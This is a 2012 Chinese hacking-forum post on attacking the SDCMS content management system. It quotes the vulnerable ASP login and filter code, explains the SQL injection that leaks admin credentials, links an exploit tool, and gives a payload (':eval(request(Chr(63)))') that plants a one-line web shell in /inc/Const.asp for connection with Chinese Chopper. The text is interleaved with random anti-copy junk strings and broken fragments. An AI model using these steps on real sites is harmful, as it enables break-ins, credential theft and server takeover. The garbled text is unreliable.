中国网络渗透测试联盟
标题:
SDCMS通杀漏洞利用工具及提权拿SHELL
[打印本页]
作者:
admin
时间:
2012-11-9 20:57
标题:
SDCMS通杀漏洞利用工具及提权拿SHELL
作者:T00LS 鬼哥
9 x" c& c8 U2 c
漏洞文件:后台目录/index.asp
) A* t a# I4 \& R) K, ~
7 u' d5 A- Q" z, P9 w
Sub Check
2 _ z, k4 ]7 M* x
Dim username,password,code,getcode,Rs
) l& a! @& u4 }$ A( G& ~. j8 D
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
* m: V c' r% o9 ?6 b# M$ a6 M
username=FilterText(Trim(Request.Form("username")),1)
0 B8 g7 z1 I/ ~! s7 M% Q
password=FilterText(Trim(Request.Form("password")),1)
/ E& V ~7 j' o4 H+ ^$ ~' `; L
code=Trim(Request.Form("yzm"))
* _ s5 W8 D% q- a+ a0 a6 U
getcode=Session("SDCMSCode")
; X2 u3 J+ o. j. {
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
0 t" p4 [% ^) f, p" e
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"
ied
9 b% j1 o* N$ \1 o% x
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"
ied
5 k B' y; G" n/ q5 F
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"
ied
9 s8 i4 `6 W+ w9 |" }
IF username="" or password="" Then
/ b" _# R8 F3 L2 t' n4 N9 }
Echo "用户名或密码不能为空"
ied
9 x4 p, R M% b: `
Else
, G, N) a/ f v# c/ O3 a
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
4 Q @ [3 C9 e6 L, _) z
IF Rs.Eof Then
0 G5 @8 s/ x- H4 x. P1 ?) ^
AddLog username,GetIp,"登录失败",1
) d, k M1 F) u
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
; d' x4 ?$ v! @
Else
# t( \# t8 m2 a2 C* t, s9 N& K
Add_Cookies "sdcms_id",Rs(0)
8 q8 H" U4 a: V$ G' K. n
Add_Cookies "sdcms_name",username
2 G% x9 I, c" I& H& g$ K0 a& A
Add_Cookies "sdcms_pwd",Rs(2)
8 p8 X, C* }0 }" C# C
Add_Cookies "sdcms_admin",Rs(3)
) {6 h. h) J1 Q! v" P/ F* u* b
Add_Cookies "sdcms_alllever",Rs(4)
' L; q$ \8 G. J2 |
Add_Cookies "sdcms_infolever",Rs(5)
9 f7 \% k. Z' E4 g
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
9 h5 ] } d; i8 d
AddLog username,GetIp,"登录成功",1
( v$ O, H3 W/ P$ i+ L
'自动删除30天前的Log记录
+ R% ~4 g, }7 b4 z; T: x5 `
IF Sdcms_DataType Then
; D8 _( O( A" f' e+ w
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
1 R$ p3 ~8 Y( l7 w
Else
4 [* i/ i! ~. Y8 G* o& Z
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
) d& J6 F p+ S; A0 e
End IF
$ o M; J0 g- E( T8 g
Go("sdcms_index.asp")
" r- b6 w9 U$ d5 s X, c* p6 v% B
End IF
3 _5 y( M2 n0 ?+ H
Rs.Close
6 f6 I2 C$ j+ ~1 [
Set Rs=Nothing
, A! P* i# o9 }( C' \. I r- w( j L
End IF
( Z0 [3 J6 M3 r8 f! E
End Sub
5 X+ _- ]# j$ o2 k- n, v
6 [2 X0 b1 j u$ |1 Y
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
2 \7 o: `$ b ? p
: [ P4 ]5 O' D% E% i* [. E
Function FilterText(ByVal t0,ByVal t1)
2 e/ X( j5 T1 c1 a7 f
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
4 T2 P, o, {" L! v% Q
t0=Trim(t0)
5 K! S" c, O6 o, `6 H+ g
Select Case t1
) w. r: L- i5 L' ~% m2 m
Case "1"
7 C( \1 Z! U/ ?0 }- D% M5 N; j. u
t0=Replace(t0,Chr(32),"")
. a$ A8 E& H) Q; z9 Q/ l$ ^
t0=Replace(t0,Chr(13),"")
$ N1 l. i- Q0 N
t0=Replace(t0,Chr(10)&Chr(10),"")
) q7 H. J% U5 v9 f* e5 ~+ w
t0=Replace(t0,Chr(10),"")
) Y$ b5 l/ E8 k- |; {2 K+ ^5 f6 W
Case "2"
4 O4 R0 k) D8 Q8 y" Q; n! ~
t0=Replace(t0,Chr(8),"")'回格
' t7 V8 c9 V9 ?& c4 o$ g
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
7 P! x: D: t+ q H' d1 X
t0=Replace(t0,Chr(10),"")'换行
/ ?' ?, Y$ V: O& _4 A! ]8 Q: d
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
$ U# B: E8 @: ?9 c+ Y, o8 @
t0=Replace(t0,Chr(12),"")'换页
! t! U4 @* @5 v& g7 G+ \
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
1 Q& l* d! }/ q9 x
t0=Replace(t0,Chr(22),"")
5 o- `8 _4 ?+ X5 b4 ~
t0=Replace(t0,Chr(32),"")'空格 SPACE
: \6 f; f$ L8 K/ d9 }5 \' {
t0=Replace(t0,Chr(33),"")'!
$ J5 T2 r5 B x8 _- P1 h# K
t0=Replace(t0,Chr(34),"")'"
" S( \+ F& c- [% {/ i: d
t0=Replace(t0,Chr(35),"")'#
% v& K- v* ^1 X& q7 V0 b
t0=Replace(t0,Chr(36),"")'$
( V& l/ t, K+ e4 L' N8 J
t0=Replace(t0,Chr(37),"")'%
U, W& X! H" V' Y+ |1 {4 Q( K
t0=Replace(t0,Chr(38),"")'&
% E; l) w) v# Q0 `! U% D4 {
t0=Replace(t0,Chr(39),"")''
5 Z; C$ \& C3 f: k+ H, g' R
t0=Replace(t0,Chr(40),"")'(
8 l; A3 |2 a/ P; Z7 ^
t0=Replace(t0,Chr(41),"")')
+ T8 m1 T0 R, Y& d3 a& R" c
t0=Replace(t0,Chr(42),"")'*
7 n* R5 N8 z/ g" v4 Z( n! U
t0=Replace(t0,Chr(43),"")'+
% {* r" H' N1 x6 J
t0=Replace(t0,Chr(44),"")',
, w) e2 ^/ E: a- M+ C, M
t0=Replace(t0,Chr(45),"")'-
+ P8 k% P' l1 e8 _( m
t0=Replace(t0,Chr(46),"")'.
3 n* h/ a, K5 t5 j0 ]- G
t0=Replace(t0,Chr(47),"")'/
8 q: s1 H* n2 J8 }. C8 P+ W
t0=Replace(t0,Chr(58),"")':
. F# A! r4 p3 u) d, j
t0=Replace(t0,Chr(59),"")';
* ^' x0 K3 @! S: q$ L, f, n
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
* S( y- Q+ v3 `0 d
t0=Replace(t0,Chr(63),"")'?
2 ?2 K0 X. v. i% i3 ]
t0=Replace(t0,Chr(64),"")'@
h& E+ E9 J. z' F/ ^5 C
t0=Replace(t0,Chr(91),"")'\
3 Z2 N s8 g9 Y5 n" J7 C
t0=Replace(t0,Chr(92),"")'\
5 J& B1 N2 {: D( o3 n7 [
t0=Replace(t0,Chr(93),"")']
- c5 i8 v. h1 ^# d4 l, q" V- P
t0=Replace(t0,Chr(94),"")'^
" t2 y' l% i* g8 t/ d
t0=Replace(t0,Chr(95),"")'_
. N3 K2 {) k0 b6 G# P i8 P% x7 [
t0=Replace(t0,Chr(96),"")'`
0 V8 G9 F9 U+ H0 _/ _8 L
t0=Replace(t0,Chr(123),"")'{
: u7 h* L, R4 I$ I
t0=Replace(t0,Chr(124),"")'|
, {) [. v6 c* s6 u, [& M* @$ V* r, _
t0=Replace(t0,Chr(125),"")'}
# h% X7 Y) P$ }1 Y
t0=Replace(t0,Chr(126),"")'~
: W+ o7 {; |' w7 ?/ {0 y7 L( @
Case Else
& l: m. }; i: Y. h# Y
t0=Replace(t0, "&", "&")
' k1 F/ H' v$ p" i: q" K! l, ?
t0=Replace(t0, "'", "'")
% j, }4 P4 G/ U
t0=Replace(t0, """", """)
2 Q, `* _2 @' L. ?: L+ J3 e
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
% e" R. V7 c& {. n* b
End Select
( [; x; r; s3 u* |; B! y! o
IF Instr(Lcase(t0),"expression")>0 Then
: R+ O; o, `6 J( h' J2 m3 g
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
, v/ _4 o3 s9 Q9 g9 @
End If
5 W# B9 O; U$ D# @/ c' v( j
FilterText=t0
3 ]4 v8 F5 A. y- M e! X; O
End Function
W* y3 ]$ T8 W5 ?, _0 A( n3 |
' ]) V, j: p2 p& I: |
看到没。直接参数是1 只过滤
, r+ L$ k( r$ G2 H! E8 `0 [
t0=Replace(t0,Chr(32)," ")
9 c+ z. h4 s0 A) a/ B5 @$ L
t0=Replace(t0,Chr(13),"")
! ^) _4 G! s5 U7 z
t0=Replace(t0,Chr(10)&Chr(10),"
! O) h4 o$ J# _, M3 N6 ~3 ^% r( J
")
# q0 P3 {/ W+ P+ \6 h% m* U/ _
t0=Replace(t0,Chr(10),"
6 I+ A, i- m$ }" W
")
# X. |3 Y) S: l; |
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
; h" A( B3 E( c# {
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
+ w, {" P3 f% v/ A
( B9 ?6 t" [! u' t T9 p
测试:
; j) A7 Y, W7 @6 m/ Y9 o6 @ N' J, d
8 y: E5 I% \1 J* M& D j. v4 H1 l$ ?- C
" E- R: a5 Y4 O! N$ V' j9 F$ a# F7 v* w
现在输入工具上验证码,然后点OK
7 t& K. K; R) Y9 h/ B8 m
0 ^4 E% c$ m* I! a6 x# L
+ J ~! j3 k1 v% p, m
看到我们直接进入后台管理界面了,呵呵!
4 a% ~6 @" a7 Z9 E
W* j0 Q! R8 @
- V8 s+ l+ O# f1 M5 ^
6 t8 R q& M- g5 a# [: V7 a- B
这样直接进入后台了。。。。
7 X2 z3 H. w2 n* H6 I W
, X1 Y; S0 K. s- N
4 l! R+ b6 i: Y/ n8 {6 S
1 Q: a/ Y0 @* C2 i
SDCMS提权:
+ y! s i' Q Y
6 D0 W, t6 ]) R2 e
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
: [* Y% {/ @6 K) H- c
$ {: ^. o- a) L) t. x8 H+ H
0 E6 W: ]. q1 ]( J% h5 F0 b- x) ^) a
" ~$ [& R5 k2 M/ h: p
OK,现在用菜刀连接下!
7 v% z3 Y$ b# Q/ U7 Z
9 J4 m; J5 u% b3 h+ C. R7 g
9 ^" C% f& L% B( U9 I. \
. p, X! x" w# x4 p+ v1 m" v/ o
4 }% V# q0 E, p5 V6 O: H/ `
- B* f7 q. z Q! q
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2
iedied5 k B' y; G" n/ q5 Fied9 s8 i4 `6 W+ w9 |" }ied